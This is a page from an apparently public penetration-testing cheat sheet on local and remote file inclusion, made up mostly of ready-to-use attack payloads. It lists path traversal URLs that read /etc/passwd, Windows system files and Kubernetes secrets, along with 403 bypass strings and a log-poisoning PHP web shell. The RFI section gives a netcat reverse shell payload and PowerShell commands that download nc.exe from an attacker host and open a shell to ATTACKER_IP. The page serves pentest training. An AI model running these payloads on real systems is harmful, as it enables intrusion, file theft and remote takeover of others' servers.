Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
AIO Recon Tools
Domain Enum
Subdomain Enum
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
LFI/RFI

Tools

1
# https://github.com/kurobeats/fimap
2
fimap -u "http://10.11.1.111/example.php?test="
3
# https://github.com/P0cL4bs/Kadimus
4
./kadimus -u localhost/?pg=contact -A my_user_agent
5
# https://github.com/wireghoul/dotdotpwn
6
dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
Copied!
How to
    1.
    Look requests with filename like include=main.inc template=/en/sidebar file=foo/file1.txt
    2.
    Modify and test: file=foo/bar/../file1.txt
      1.
      If the response is the same could be vulnerable
      2.
      If not there is some kind of block or sanitizer
    3.
    Try to access world-readable files like /etc/passwd /win.ini

LFI

1
# Basic LFI
2
curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
3
​
4
# If LFI, also check
5
/var/run/secrets/kubernetes.io/serviceaccount
6
​
7
# PHP Filter b64
8
http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
9
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
10
http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php
11
# Nullbyte ending
12
http://10.11.1.111/page=http://10.11.1.111/maliciousfile%00.txt
13
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00
14
# Other techniques
15
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
16
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
17
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd
18
https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd
19
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00
20
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html
21
https://abc.redact.com/asd.php?file:///etc/passwd
22
https://abc.redact.com/asd.php?file:///etc/passwd%00
23
https://abc.redact.com/asd.php?file:///etc/passwd%00.html
24
https://abc.redact.com/asd.php?file:///etc/passwd%00.ext
25
https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd
26
https://target.com/admin..;/
27
https://target.com/../admin
28
https://target.com/whatever/..;/admin
29
https://target.com/whatever.php~
30
# Cookie based
31
GET /vulnerable.php HTTP/1.1
32
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
33
# LFI Windows
34
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
35
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini
36
http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini
37
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00
38
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html
39
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini
40
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00
41
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html
42
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini
43
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00
44
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html
45
http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini
46
http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini
47
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext
48
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext
49
​
50
# LFI using video upload:
51
https://github.com/FFmpeg/FFmpeg
52
https://hackerone.com/reports/226756
53
https://hackerone.com/reports/237381
54
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit
55
https://github.com/neex/ffmpeg-avi-m3u-xbin
56
​
57
# Contaminating log files
58
[email protected]:~# nc -v 10.11.1.111 80
59
10.11.1.111: inverse host lookup failed: Unknown host
60
(UNKNOWN) [10.11.1.111] 80 (http) open
61
<?php echo shell_exec($_GET['cmd']);?>
62
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
63
​
64
# Common LFI to RCE:
65
Using file upload forms/functions
66
Using the PHP wrapper expect://command
67
Using the PHP wrapper php://file
68
Using the PHP wrapper php://filter
69
Using PHP input:// stream
70
Using data://text/plain;base64,command
71
Using /proc/self/environ
72
Using /proc/self/fd
73
Using log files with controllable input like:
74
/var/log/apache/access.log
75
/var/log/apache/error.log
76
/var/log/vsftpd.log
77
/var/log/sshd.log
78
/var/log/mail
79
​
80
# LFI possibilities by filetype
81
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
82
SVG: Stored XSS / SSRF / XXE
83
GIF: Stored XSS / SSRF
84
CSV: CSV injection
85
XML: XXE
86
AVI: LFI / SSRF
87
HTML / JS : HTML injection / XSS / Open redirect
88
PNG / JPEG: Pixel flood attack (DoS)
89
ZIP: RCE via LFI / DoS
90
PDF / PPTX: SSRF / BLIND XXE
91
92
# Chaining with other vulns
93
../../../tmp/lol.png —> for path traversal
94
sleep(10)-- -.jpg —> for SQL injection
95
<svg onload=alert(document.domain)>.jpg/png —> for XSS
96
; sleep 10; —> for command injections
97
​
98
# 403 bypasses
99
/accessible/..;/admin
100
/.;/admin
101
/admin;/
102
/admin/~
103
/./admin/./
104
/admin?param
105
/%2e/admin
106
/admin#
107
/secret/
108
/secret/.
109
//secret//
110
/./secret/..
111
/admin..;/
112
/admin%20/
113
/%20admin%20/
114
/admin%20/page
115
/%61dmin
116
​
117
# Path Bypasses
118
# 16-bit Unicode encoding
119
# double URL encoding
120
# overlong UTF-8 Unicode encoding
121
….//
122
….\/
123
…./\
124
….\\
Copied!

RFI

1
# RFI:
2
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
3
Content of evil.txt:
4
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
5
# RFI over SMB (Windows)
6
cat php_cmd.php
7
<?php echo shell_exec($_GET['cmd']);?>
8
# Start SMB Server in attacker machine and put evil script
9
# Access it via browser (2 request attack):
10
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
11
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234
12
​
13
# Cross Content Hijacking:
14
https://github.com/nccgroup/CrossSiteContentHijacking
15
https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
16
http://50.56.33.56/blog/?p=242
17
​
18
# Encoding scripts in PNG IDAT chunk:
19
https://yqh.at/scripts_in_pngs.php
20
​
Copied!
Previous
Crawl/Fuzz
Next
File upload
Last modified 7mo ago
Export as PDF
Copy link
Contents
Tools
LFI
RFI